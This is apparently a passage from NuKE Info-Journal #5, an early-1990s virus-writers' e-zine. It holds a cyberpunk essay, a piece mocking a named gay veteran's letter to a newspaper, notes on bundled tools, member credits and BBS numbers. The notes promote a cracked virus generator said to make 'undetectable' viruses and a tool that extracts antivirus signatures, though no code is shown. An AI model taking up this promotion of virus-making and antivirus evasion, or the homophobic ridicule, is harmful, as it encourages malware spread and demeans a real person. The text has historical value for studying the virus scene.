Synergy has created a huge spark that has developed into our current Cyberpunk movement. Science fiction took off, and we had the beginning of it with William Gibson's _Neuromancer_ in 1984. The well-known movie _War Games_ was amongst the first to draw ME (Rock Steady) into the Cyberpunk world. Other Cyberpunk-oriented works by writers such as Bruce Sterling (_Schismatrix_, _Islands in the Net_), Pat Cadigan (_Mindplayers_, _Pretty Boy Crossover_) and John Shirley (_Eclipse Corona_) captured SF fans. Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa Overdrive_, as well as an anthology of short stories, _Burning Chrome_.
Of course we can say this all began in Ridley Scott's 1980 movie _Blade Runner_, loosely based on Philip K. Dick's novel "Do Androids Dream of Electric Sheep?" The flood has even fallen into the now so-called cyberpunk bands which have European roots, including Front-242 (Belgium), Laibach (Yugoslavia) and Can (Germany). The flood of culture certainly attracted several punks, many of whom now can draw their links to such SF culture.

However, just like "hacker," the term "cyberpunk" has also come to mean "computer criminal," and cases like the 1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by 25-year-old Robert Morris, the worm shut down some 6,500 computers and caused an estimated $150,000 to $200 million worth of damages to computer systems nationwide.

Since then, there have been several instances of what the hackers claim are government attempts to suppress the cyberpunk media. Steve Jackson Games is a case in point. Secret Service agents raided this small Austin-based game manufacturer, publishers of fantasy-role-playing games, in March of 1990.

With the recent arrests of numerous hackers for illegal entry and data possession, the battles over control of the electronic frontier and hackers' rights are now being waged in courts. One critical issue is whether information belongs to a given corporation or government or whether it belongs to the world.

Certainly what started off as science fiction isn't science fiction any more. The several arrests are meant to make an example, and to perhaps scare us back "into place." Of course this is where the NuKE turning point arrives; rather than hacking ourselves and risking ourselves against the lawman, there is the idea of making a program to perhaps work like ourselves, its mission to bypass software restrictions and perhaps to send a message to all, or to make the world fall upon their knees and go crying to Paul Ferguson for help.
I can assure you that the cyberpunk future is still up for grabs, between utopia and dystopia, and whatever it will be it will be a long, hard battle to the end.

                                        Rock Steady and The NuKE Associates
===========================================================================
===========================================================================
The Truth About Gary...
~~~~~~~~~~~~~~~~~~~~~~~

The following is an actual letter to the editor from the January 18th issue of the _Chicago Tribune_ (sec. 1, p. 12). I am not making this up. For your convenience, I've typed it up just as it appears in the paper:

On tolerance

OAK PARK --- This is in response to "A battle for the military's soul," by Robert Maginnis. How nice of you, sir, as a lieutenant colonel, to be able to express the views of an organization of close to 1 million employees! I also respect that you, as a stated heterosexual, also know the tendencies of the approximately 2.56 million homosexuals in the United States. And I, having proudly served seven years in the military, was doing it wrong! I should have, as a homosexual being, been more promiscuous, tried suicide, become an alcoholic, contracted a sexual disease, had close to 500 partners (wow!), and abused children to boot. As to the transfusions of blood, I guess the rest of the world is less risky, with 90 percent of HIV infections worldwide being within the heterosexual sphere. Furthermore, the terminology you attempt to use, pro-gay sensitivity or re-education classes, is laughable. All we're asking is to be treated with respect as human beings. The rest of the world lives with these gay people; why in the hell shouldn't you? Recognize the right to be human in all our ways.

Gary Watson
^^^^^^^^^^^

Aha! So the truth finally comes out Gary! We all knew it all along! I'm just glad that you came out of the closet by submitting your letter to a major newspaper...
                                                            Nowhere Man/NuKE
===========================================================================
===========================================================================
Files Included With NuKE Info-Journal #5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DETECTOR.ZIP
~~~~~~~~~~~~
Included with this kit are a few .ZIPs that our two good friends wrote. The first is called DETECTOR.ZIP. It consists of a "strain extractor" by Savage Beast/NuKE. This software will be able to help you to catch your funny viruses when no scanner finds them. Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They should be infected, then reset your computer and execute the DETECTOR program. Have fun and use the program in good health!

Provided by: Savage Beast

GENVIRUS.ZIP
~~~~~~~~~~~~
GenVirus is a virus generator developed in France. This program was ORIGINALLY in French, and "crippled," meaning you had to send the dickweed programmer mondo money for a legit copy. So we gave it to Rock Steady, who cracked the shit out of the file! Being in Canada and stranded in Quebec (French-Pepper land), Rock Steady was able to translate the WHOLE GenVirus program into English! It was tough, being written in C++, but once you live and breathe ASM it's just a matter of time. Anyhow thanks to Savage Beast for getting us a copy of this program!

REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE! The program ONLY compiles binary code, and attaches the virus to a "dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0, (VCL changed the WHOLE WORLD!), and still goes undetectable, as people never were able to crack the program...

Provided by: Savage Beast
Cracked by: Rock Steady

MCAFEE.STR
~~~~~~~~~~
Is a product of Screaming Radish from Australia that extracts all virus signatures from any version of McAfee Scan.
We are unable to release the product in this info journal as McAfee may
restructure their virus format of saving virus signatures, as they can do
so by simply changing one or two small adjustments; therefore this program
is not available to the general public. But if you want to get a copy call
any of the NuKE Support systems.

Provided: Screaming Radish

The NuKE Associates
===========================================================================
===========================================================================

NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK                                   E-
KE              CREDITS              -N
E-                                   Nu
-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK

NuKE would like to send its extended thanks to all supporters and members
that have put themselves on the line to be with us. Mainly:

Death Angel       (416)  [Thanks for your support! (And source!)]
Rock Steady       (514)  [You have the right to remain silent. You..]
Pure Energy       (514)  [I have a Board? Naaa...]
Silent Shadow     (514)  [What?, Who?, How?, When?, Where?, Why?]
Nowhere Man       (708)  [See, no capital "W" Nowhere!]
ARiSToTLE         (804)  [TRISKAIDEKAPHOBIA - one of a kind dude.]
FireCracker       (804)  [Huh, VGA? What's VGA? Gimme my money back!]
Dark Angel        (819)  [Can't have a group without you, huh?]
Savage Beast      (+41)  [Hey where's my limo???]
Ford Fairlane     (+46)  [That's for staying on our side!]
Tormentor/DY      (+46)  ["Fame" is truly an evil]
Phrozen Doberman  (+61)  [Gooooood Daaaaay...]
Screaming Radish  (+61)  [Beastiality you say?...humm]
TäLöN             (+61)  [Where's my XXX calendar of the AVers?]
Shidaq Arl'hur    (+61)  [Welcome aboard mate!]
The Wierd One     (+61)  [FCB, how's it taste?]
The Dark Elf      (+61)  [Scan strings, who needs scan strings?]

(Ordered by area/country code. We don't like to play favourites!)

Anyhow if I missed anyone SIMPLY send me e-mail, no credit ruining, no
letter bombs, PLEASE! But I believe I put in everyone that has contributed
a lot to the NuKE Team, and we thank you in return.

NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites
---------------------------------------------------------------------------
├───[BBS Name]───────[Phone Number][Modem]──[SysOp]────────────[NuKE-Net]─┤
 Cybernetic Voilence. 514-425-4540 V32Bis  Pure Energy      American HUB
 Total Mayhem........+613-ASK-NUKE HST/DS  Phrozen Doberman Australian HUB
 Enigma E:N:U:N.....+41-22-3400329 V32Bis  Savage Beast     European HUB
├─────────────────────────────────────────────────────────────────────────┤

I listed only the HUB systems, as that is always where you can reach any of
us for sure. We do have many other systems, but since this file will not be
encrypted I didn't wish to post them for reasons of security. If you wish
to join NuKENET simply call up the hub(s) closest to your area, and you
will be joined up to it.

Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto,
Detroit, Chicago, Philadelphia, Richmond, Stockholm, Göteborg, Geneva,
Amsterdam, Sofia, Melbourne, and Brisbane.

Remember, main rules for NuKENET are that you must call the system up every
2-3 days, anything less will purge you from our net; no illegalities, no
codes and material like that (they will be turned over to the appropriate
law enforcement!). And we insist on an active system -- one post per month
ain't our idea of active.

Rock Steady/NuKE
===========================================================================